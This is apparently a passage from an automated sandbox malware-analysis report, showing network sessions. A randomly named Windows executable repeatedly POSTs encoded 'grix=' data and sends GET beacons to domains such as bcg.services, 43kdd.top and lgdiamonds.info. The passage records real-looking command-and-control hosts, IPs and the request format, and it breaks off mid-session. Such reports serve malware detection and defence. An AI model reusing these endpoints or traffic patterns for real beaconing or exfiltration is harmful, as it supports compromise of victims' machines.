                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 69 76 2f 44 4e 50 7a 6d 76 48 49 39 2b 58 33 41 74 62 32 6a 50 51 6a 47 58 73 51 65 4c 33 54 4f 43 58 4a 39 5a 6f 78 6d 77 51 66 43 48 39 69 50 62 41 76 4d 7a 47 69 37 44 2f 62 42 58 62 79 6b 71 52 6c 32 75 62 71 2b 78 56 41 55 72 6d 71 68 65 4f 53 66 36 49 52 58 39 46 74 55 6f 53 6f 44 61 36 53 79 6d 48 61 52 62 44 6b 57 58 74 36 56 6d 4d 7a 52 4c 46 33 2f 38 4b 4d 58 42 52 63 61 2f 76 4b 39 6e 79 5a 42 43 38 33 2f 4b 4c 58 72 38 4a 2b 68 33 45 4c 56 51 6a 47 43 66 5a 49 4e 38 53 78 7a 2f 77 68 6a 6b 64 6d 34 63 64 7a 39 71 75 78 46 66 56 74 41 3d 3d
                                                      Data Ascii: grix=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjtiv/DNPzmvHI9+X3Atb2jPQjGXsQeL3TOCXJ9ZoxmwQfCH9iPbAvMzGi7D/bBXbykqRl2ubq+xVAUrmqheOSf6IRX9FtUoSoDa6SymHaRbDkWXt6VmMzRLF3/8KMXBRca/vK9nyZBC83/KLXr8J+h3ELVQjGCfZIN8Sxz/whjkdm4cdz9quxFfVtA==
                                                      Jan 10, 2025 21:47:00.392098904 CET73INHTTP/1.1 405 Method Not Allowed
                                                      content-length: 0
                                                      connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.64998913.248.169.48803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:02.571429968 CET1776OUTPOST /5onp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 4a 53 4f 49 4c 71 6d 31 68 58 63 4f 38 68 35 49 74 78 57 69 6d 79 48 44 38 57 35 6a 6a 74 36 76 38 77 46 50 68 56 48 48 47 64 2b 58 37 67 74 65 32 6a 50 64 6a 43 37 67 51 65 50 4e 54 4d 36 58 4a 62 56 6f 6d 6a 63 51 57 43 48 39 67 50 62 4e 68 73 79 47 69 37 54 37 62 43 2f 62 79 6b 71 52 6c 33 2b 62 36 66 78 56 4d 30 72 70 74 68 65 61 57 66 36 67 52 57 56 56 74 55 6b 43 70 79 36 36 52 53 32 48 64 7a 6a 44 6d 32 58 76 37 56 6e 66 7a 51 33 65 33 2f 78 37 4d 58 64 37 63 61 62 76 61 34 57 57 45 78 2b 48 6f 39 72 75 55 73 56 6f 78 45 72 49 4d 30 51 2b 4f 78 50 4c 46 4f 64 78 36 6d 44 34 30 53 31 64 74 72 55 70 39 36 7a 69 6b 55 4b 73 31 41 76 4f 4e 4f 64 4d 42 70 58 53 45 2b 36 7a 57 62 53 43 66 6d 2f 44 61 52 7a 62 72 70 57 34 7a 66 34 66 35 63 52 5a 2b 6d 5a 5a 43 41 62 2b 67 53 66 49 6c 6f 42 37 43 55 39 7a 38 6c 45 72 34 42 66 55 2b 79 44 59 56 49 68 6c 4f 59 36 61 79 52 6c 61 54 49 33 32 47 4a 49 34 32 55 41 57 31 55 47 79 32 62 47 56 36 48 6d 53 61 [TRUNCATED]
                                                      Data Ascii: grix=VSFgwmtnFo8YJSOILqm1hXcO8h5ItxWimyHD8W5jjt6v8wFPhVHHGd+X7gte2jPdjC7gQePNTM6XJbVomjcQWCH9gPbNhsyGi7T7bC/bykqRl3+b6fxVM0rptheaWf6gRWVVtUkCpy66RS2HdzjDm2Xv7VnfzQ3e3/x7MXd7cabva4WWEx+Ho9ruUsVoxErIM0Q+OxPLFOdx6mD40S1dtrUp96zikUKs1AvONOdMBpXSE+6zWbSCfm/DaRzbrpW4zf4f5cRZ+mZZCAb+gSfIloB7CU9z8lEr4BfU+yDYVIhlOY6ayRlaTI32GJI42UAW1UGy2bGV6HmSafqMWZF/lQgmhGLgDLuyXCsERn7ZgfEL/pK93opaaIXjPPFWfvXtULaCR4sBNVou9NU/yKzECuSX/YFedab0r5U6bVLJhPTtxteQJ62gPCQa5bxUEL4AbFygiUK7r5x3mQ7OUNmNKpCd6CyJG7WA7U4/JxXIWsWRIwICL8imiBsh7UUY+Vcm5/1PJMa3Xl/Ies7PGKtvgo15Zziw6yIdzG03Vv2y2GxJL4MvDNGPNiihWukAJWYqaEFDG8rh+Q8zUETeavshW53Txc2gfbAghekiKUfoQ7bndLASA1Swg5uLJBs0hrbT/UNtHTTIR38JwJt1PeLyMsF4KPT6C1y/64Lsp9GLlU7EzIlfZ6qgzqmf8RB0zzI+XPPSn5uDdGXgM6d3oncXt5tf1VmvWcqsKEUAC4kPMZHeqcfATcMu5dlHcr8k9dQTzohb7LwOqshkpoE57krL4Tdahf86it4aXJpKP3IQu4BCXVKFdBg4+hHUDPwAOkzQ8Pnv/6wo2dPA4vknYX9TOB3KuPFzMqVUazohJwAHjDr9oH1FzOJYbGTBIaN4K2zmv6XgWlQEBDNdiMQnQ4cqF9ZB6gC8iWn5y71l5s8ypy2lwkVCYG21Fo/py1gRgtdwzECfMnCRrfVBZQ++wkVBQIoB0CrFdCMOaO/AcZ3srxzUdi6 [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.64999013.248.169.48803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:05.119551897 CET483OUTGET /5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.bcg.services
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:47:05.664601088 CET393INHTTP/1.1 200 OK
                                                      content-type: text/html
                                                      date: Fri, 10 Jan 2025 20:47:05 GMT
                                                      content-length: 272
                                                      connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 72 69 78 3d 59 51 74 41 7a 51 46 68 45 4c 68 2b 4e 53 53 6f 44 71 44 6f 6d 57 49 37 68 7a 49 6c 36 44 37 6d 38 69 48 61 34 57 31 34 73 2f 6a 31 38 78 78 30 75 44 79 38 4d 59 57 48 30 42 39 2f 79 77 33 58 71 44 4c 5a 63 6f 36 71 57 70 36 74 48 61 78 38 78 79 73 2b 56 57 32 54 74 65 37 4c 6e 36 2f 4b 70 71 47 62 53 44 58 6a 68 41 72 42 78 58 79 73 72 74 4e 32 44 6d 58 64 33 56 61 36 4f 4e 61 6d 52 58 68 32 76 45 4d 3d 26 6a 78 6b 3d 48 74 4f 34 73 78 44 58 57 6a 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.649991154.23.178.231803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:27.558289051 CET730OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 50 6c 55 34 79 33 69 4a 59 4b 51 42 54 75 74 6b 79 45 77 34 6f 48 62 45 45 71 74 57 4d 69 56 38 64 4f 73 52 31 39 75 6f 4d 4b 70 43 75 66 70 59 45 48 54 69 79 41 4f 72 4d 76 5a 65 57 44 77 34 6a 61 52 73 37 48 54 67 7a 53 61 52 36 6c 37 54 38 71 39 6e 2b 57 7a 5a 35 76 44 51 30 6d 53 72 65 49 42 6d 55 6b 34 4e 46 41 68 71 7a 57 67 7a 69 44 78 58 45 52 30 74 55 54 4b 34 4f 50 30 4d 2f 36 37 63 77 7a 4f 43 6e 66 2f 36 7a 34 5a 4b 6f 70 78 45 48 51 66 57 72 64 43 53 36 57 51 4e 78 62 72 63 7a 43 47 55 39 47 36 78 7a 77 4f 61 55 54 55 62 34 61 58 4d 37 30 58 47 43 6a 59 2f
                                                      Data Ascii: grix=9/+MxePuBp2hPlU4y3iJYKQBTutkyEw4oHbEEqtWMiV8dOsR19uoMKpCufpYEHTiyAOrMvZeWDw4jaRs7HTgzSaR6l7T8q9n+WzZ5vDQ0mSreIBmUk4NFAhqzWgziDxXER0tUTK4OP0M/67cwzOCnf/6z4ZKopxEHQfWrdCS6WQNxbrczCGU9G6xzwOaUTUb4aXM70XGCjY/
                                                      Jan 10, 2025 21:47:28.430403948 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.649993154.23.178.231803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:30.106926918 CET754OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 6c 38 65 75 38 52 32 38 75 6f 4c 4b 70 43 68 2f 70 6e 4b 6e 54 72 79 41 44 63 4d 76 31 65 57 48 59 34 6a 66 74 73 6e 6c 37 6a 68 79 61 66 38 6c 37 52 68 36 39 6e 2b 57 7a 5a 35 76 57 31 30 6d 61 72 65 34 52 6d 56 46 34 4b 49 67 68 74 32 57 67 7a 6d 44 78 54 45 52 30 44 55 58 43 57 4f 4b 77 4d 2f 37 72 63 31 79 4f 46 74 66 2f 67 38 59 59 2f 68 73 6f 41 47 44 69 51 30 4f 36 42 73 32 31 74 77 74 32 47 76 78 47 33 76 57 61 7a 7a 79 57 6f 55 7a 55 78 36 61 76 4d 70 6a 62 68 4e 58 39 63 35 78 2f 52 46 43 69 61 68 65 67 33 46 38 39 48 39 52 77 37 47 41 3d 3d
                                                      Data Ascii: grix=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3l8eu8R28uoLKpCh/pnKnTryADcMv1eWHY4jftsnl7jhyaf8l7Rh69n+WzZ5vW10mare4RmVF4KIght2WgzmDxTER0DUXCWOKwM/7rc1yOFtf/g8YY/hsoAGDiQ0O6Bs21twt2GvxG3vWazzyWoUzUx6avMpjbhNX9c5x/RFCiaheg3F89H9Rw7GA==
                                                      Jan 10, 2025 21:47:31.006692886 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.649994154.23.178.231803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:32.654007912 CET1767OUTPOST /bsyy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.43kdd.top
                                                      Origin: http://www.43kdd.top
                                                      Referer: http://www.43kdd.top/bsyy/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 39 2f 2b 4d 78 65 50 75 42 70 32 68 4f 46 45 34 2f 32 69 4a 4a 71 51 4f 63 4f 74 6b 34 6b 78 2f 6f 48 58 45 45 72 6f 4e 4d 33 74 38 64 64 6b 52 30 66 47 6f 4b 4b 70 43 6f 66 70 63 4b 6e 53 37 79 44 7a 59 4d 76 70 6f 57 42 63 34 69 35 35 73 72 45 37 6a 72 79 61 66 78 46 37 53 38 71 38 6a 2b 58 66 64 35 76 47 31 30 6d 61 72 65 36 5a 6d 57 55 34 4b 62 77 68 71 7a 57 67 33 69 44 78 33 45 52 38 31 55 58 48 6a 4e 35 34 4d 2f 61 62 63 33 67 6d 46 68 66 2f 2b 39 59 59 6e 68 73 73 50 47 44 2b 79 30 50 4f 72 73 31 70 74 78 35 54 35 7a 41 71 68 31 48 61 69 72 6a 6d 70 64 57 67 34 30 73 58 57 35 56 44 79 43 6c 52 38 68 42 7a 76 42 7a 4b 65 73 49 4e 58 4c 73 63 7a 2b 79 56 79 46 42 73 63 45 7a 56 37 69 7a 35 38 35 78 58 4d 2f 4d 6e 70 4a 2f 6e 47 30 33 55 42 4f 58 32 69 43 71 2f 54 74 67 48 51 68 72 41 2f 75 69 71 7a 54 63 44 57 66 77 6d 65 54 62 68 32 52 53 59 4c 4d 55 53 69 61 72 56 56 63 75 51 74 71 57 72 42 6d 4a 35 33 30 57 2f 53 66 36 52 69 6d 63 67 76 57 58 57 47 4c 42 6f 31 58 5a 35 43 39 [TRUNCATED]
                                                      Data Ascii: grix=9/+MxePuBp2hOFE4/2iJJqQOcOtk4kx/oHXEEroNM3t8ddkR0fGoKKpCofpcKnS7yDzYMvpoWBc4i55srE7jryafxF7S8q8j+Xfd5vG10mare6ZmWU4KbwhqzWg3iDx3ER81UXHjN54M/abc3gmFhf/+9YYnhssPGD+y0POrs1ptx5T5zAqh1HairjmpdWg40sXW5VDyClR8hBzvBzKesINXLscz+yVyFBscEzV7iz585xXM/MnpJ/nG03UBOX2iCq/TtgHQhrA/uiqzTcDWfwmeTbh2RSYLMUSiarVVcuQtqWrBmJ530W/Sf6RimcgvWXWGLBo1XZ5C9d/wUuSCON6eRkofjRryn9XTcyJ9Qi4mQJg5hHSGJyrYxx22Xq5df7jcWZ0hoXMcBSgOZckfDjrqQfbIbMDs5ffeZHvgZv0AmF2ugiULZfeXQ4cJhnTW1MRQSmuCjOSEhK/nrAMG+hG8sCUdC/OJzrvTtfSZK8WBAQeY9EgKLOOn4WxEz86traxXCTjt6coAp7RWtXNXTzrgJzBOlNC6bnoOqk4mcWD42a5ywk2enPKalO7OLMCIayy/+KQqZFiNzp8hbq3L5O1aoujECyUfSRj8PwAz3RC8pbsqyFuYOlANHslB6cGhSpltOdcnnYKIazhgdm5aKILuDA8I9PLjEaN5ZeQ60QKBM1kPq/AUM3tEQLYQCJIHKMSi7twnA7gaJThSvyBPuPwW6X7JOITqEGniQEW5jrxsIHHlI/5bf3o4YbZH1pifViFSluO/lMtRBKq0NHLudReAV1nNpGAFMZW5HTL0GKeC575OC8eSbTh1jqs4lMDGQ1GkQnMUnrYmiDGad9j3yMKg3VHXcRO8tSZY/+ken2gkWovGrxnOSfpiQxWihMFCYilgQanKZGW0VpaOHeBUxfV4js6nQO8j9cBYN5G+6NcSVBKH2oHaJxP7yD9VReuX0oJVyBEBuL7ssb5N8WvAnuYDDoIAz5Rxs00/sqri9rO2ZnH [TRUNCATED]
                                                      Jan 10, 2025 21:47:33.644891024 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.649995154.23.178.231803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:35.203078032 CET480OUTGET /bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.43kdd.top
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:47:36.092259884 CET312INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 10 Jan 2025 20:47:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 148
                                                      Connection: close
                                                      ETag: "67811756-94"
                                                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.649996130.185.109.77803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:41.170913935 CET748OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6d 6b 4f 63 6a 50 53 2b 4c 4f 52 48 72 49 30 6c 6a 6d 4a 64 61 59 49 53 6d 31 7a 59 34 56 35 67 30 56 44 69 71 55 67 53 66 34 75 76 4b 35 68 57 5a 70 65 39 6f 66 47 78 58 50 6f 44 69 34 43 49 70 70 4c 78 68 7a 62 4b 6c 42 72 78 58 72 75 39 57 54 76 64 33 65 36 64 45 55 62 47 2b 51 6e 2f 76 69 39 61 50 53 77 44 69 41 52 6a 6a 2b 78 76 77 75 48 4f 53 4f 66 39 37 66 59 77 43 4e 44 77 76 6a 2f 53 79 58 46 6c 2b 2b 6b 34 34 75 4f 59 5a 35 44 6c 44 38 6e 52 61 49 65 67 79 62 32 79 69 43 52 76 75 72 49 52 6a 5a 39 43 59 71 48 78 31 61 6a 6c 71 31 4c 2f 49 5a 52 35 39 4d 4e 30
                                                      Data Ascii: grix=HK56D0Zh/f+HmkOcjPS+LORHrI0ljmJdaYISm1zY4V5g0VDiqUgSf4uvK5hWZpe9ofGxXPoDi4CIppLxhzbKlBrxXru9WTvd3e6dEUbG+Qn/vi9aPSwDiARjj+xvwuHOSOf97fYwCNDwvj/SyXFl++k44uOYZ5DlD8nRaIegyb2yiCRvurIRjZ9CYqHx1ajlq1L/IZR59MN0
                                                      Jan 10, 2025 21:47:41.772505045 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:41 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.649997130.185.109.77803524C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 21:47:43.718034983 CET772OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
